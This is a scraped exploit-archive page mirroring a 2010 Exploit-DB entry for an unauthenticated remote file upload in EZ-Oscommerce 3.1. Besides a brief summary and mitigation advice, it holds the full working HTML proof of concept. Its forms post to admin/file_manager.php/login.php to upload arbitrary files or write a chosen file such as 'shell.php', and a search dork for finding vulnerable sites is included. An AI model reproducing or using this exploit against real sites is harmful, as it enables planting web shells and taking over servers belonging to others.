Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
EZ-Oscommerce 3.1 Remote File Upload - exploit.company
header-logo
Suggest Exploit
vendor:
EZ-Oscommerce
by:
indoushka
5.5
CVSS
MEDIUM
Remote File Upload
CWE
Product Name: EZ-Oscommerce
Affected Version From: EZ-Oscommerce 3.1
Affected Version To: EZ-Oscommerce 3.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows SP2 Fran?ais
2010

EZ-Oscommerce 3.1 Remote File Upload

This exploit allows an attacker to upload files remotely to the EZ-Oscommerce 3.1 website. The vulnerability exists in the file_manager.php/login.php component of the application. By exploiting this vulnerability, an attacker can upload malicious files to the target website.

Mitigation:

The vendor should release a patch or update to fix this vulnerability. In the meantime, users are advised to restrict access to the file_manager.php/login.php component and regularly monitor their website for any unauthorized file uploads.
Source

Exploit-DB raw data:

====================================================
EZ-Oscommerce 3.1 Remote File Upload
====================================================

######################################################################## 
# Vendor: http://www.ezosc.com
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : indoushka@hotmail.com 
# Home : www.arab-blackhat.co.cc
# Dork :Powered by osCommerce | Customized by EZ-Oscommerce
# Bug  : Remote File Upload 
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 


<html><head><title> EZ-Oscommerce 3.1 - Remote File Upload </title></head> 

<br><br><u>UPLOAD FILE:</u><br> 

<form name="file" action="http://site/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> 

<input type="file" name="file_1"><br> 

<input name="submit" type="submit" value="   Upload   " > 

</form> 

<br><u>CREATE FILE:</u><br> 

<form name="new_file" action="http://site/admin/file_manager.php/login.php?action=save" method="post"> 

FILE NAME:<br> 

<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br> 

<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; 

<input name="submit" type="submit" value="   Save   " > 

</form> 

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------